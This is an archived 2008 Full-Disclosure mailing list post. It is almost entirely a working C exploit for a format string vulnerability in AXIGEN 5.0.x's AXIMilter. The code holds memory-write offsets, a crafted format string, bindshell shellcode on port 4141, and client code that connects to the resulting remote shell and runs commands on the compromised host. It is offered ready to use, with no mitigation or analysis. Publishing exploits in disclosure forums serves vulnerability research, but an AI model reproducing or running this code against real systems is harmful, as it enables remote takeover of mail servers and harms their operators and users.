lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <JUYRIZ$1A44B9B6BED049A06E27002D0D2685D8@bol.com.br>
Date: Sun, 20 Jan 2008 20:23:23 -0200
From: "hempel" <hempel@....com.br>
To: "full-disclosure" <full-disclosure@...ts.grok.org.uk>
Subject: AXIGEN 5.0.x AXIMilter Format String Exploit

/*
 * Axigen 5.0.x AXIMilter Format String Exploit
 *
 * by hempel (JAN 16 2008)
 *
 * thx to mu-b (digit-labs.org)
 *
 */
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>
#include <string.h>

char buf[] = 
    "FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: "
/* offsets */
    "\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x08"
    "\xbc\x96\x05\x08\xbd\x96\x05\x08\xbe\x96\x05\x08\xbf\x96\x05\x08"
    "\xc0\x96\x05\x08"
/* format string */
    "%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%"
    "17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn"
    "\r\nRCPT:\r\nVERI: "
/* bindshell code (port 4141) */
    "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdc"
    "\xc8\x06\xb7\x83\xeb\xfc\xe2\xf4\xed\x13\x55\xf4\x8f\xa2\x04\xdd"
    "\xba\x90\x9f\x3e\x3d\x05\x86\x21\x9f\x9a\x60\xdf\xcc\xe5\x60\xe4"
    "\x55\x29\x6c\xd1\x84\x98\x57\xe1\x55\x29\xcb\x37\x6c\xae\xd7\x54"
    "\x11\x48\x54\xe5\x8a\x8b\x8f\x56\x6c\xae\xcb\x37\x4f\xa2\x04\xee"
    "\x6c\xf7\xcb\x37\x95\xb1\xff\x07\xd7\x9a\x6e\x98\xf3\xbb\x6e\xdf"
    "\xf3\xaa\x6f\xd9\x55\x2b\x54\xe4\x55\x29\xcb\x37"
    "\r\nPASS:\r\n";

static int
shell_sock (char *host, int port)
{
    struct sockaddr_in addr;
    int sockfd;

    sockfd = socket(PF_INET, SOCK_STREAM, 0);
    if (sockfd == -1) {
        perror ("socket");
	return 0;
    }
    
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(host);
    addr.sin_port = htons(port);

    if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
        perror ("connect");
	return 0;
    }

    return sockfd;
}

static void
shell_run (int sockfd)
{
    int rs;
    fd_set rset;
    char rbuf[1024], *cmd = "id; uname -a; uptime\n";

    write(sockfd, cmd, strlen(cmd));
 
    while (1) {
        FD_ZERO (&rset);
        FD_SET (sockfd, &rset);
        FD_SET (STDIN_FILENO, &rset);
        
	select (sockfd + 1, &rset, NULL, NULL, NULL);
	if (FD_ISSET (sockfd, &rset)) {
	    rs = read (sockfd, rbuf, sizeof(rbuf) - 1);
            if (rs <= 0) {
                perror("read");
		return;
            }
	    rbuf[rs] = '\0';
            printf ("%s", rbuf);
        }
        
	if (FD_ISSET (STDIN_FILENO, &rset)) {
	    rs = read(STDIN_FILENO, rbuf, sizeof(rbuf) - 1);
            if (rs > 0) {
        	rbuf[rs] = '\0';
        	write (sockfd, rbuf, rs);
            }
        }
    }
}

int 
main(int argc, char **argv)
{
    int sockfd, port, buf_len;
    struct sockaddr_in addr;
    char *host;
    
    printf("AXIGEN 5.0.x AXIMilter format string Exploit by hempel\n");
    
    if (argc < 2) {
	printf("%s host port\n", *argv);
	return 0;
    }
    
    host = argv[1];
    port = atoi(argv[2]);
        
    sockfd = socket(PF_INET, SOCK_STREAM, 0);
    if(sockfd == -1) {
	perror("socket");
	return -1;
    }
    
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(host);
    addr.sin_port = htons(port);
    
    if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
	perror("connect");
	return -1;
    }
    
    buf_len = sizeof(buf) - 1;
    if (write(sockfd, buf, buf_len) == -1) {
	perror("write");
	return -1;
    }    
    close(sockfd);

    printf("trying shell at %s:4141 ...", host);
    fflush(stdout);
    sockfd = shell_sock(host, 4141);
    if (sockfd) {
	printf("w00t!\n");
	shell_run(sockfd);
    } else {
	printf("nope!\n");
    }
    
    return 0;
}


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ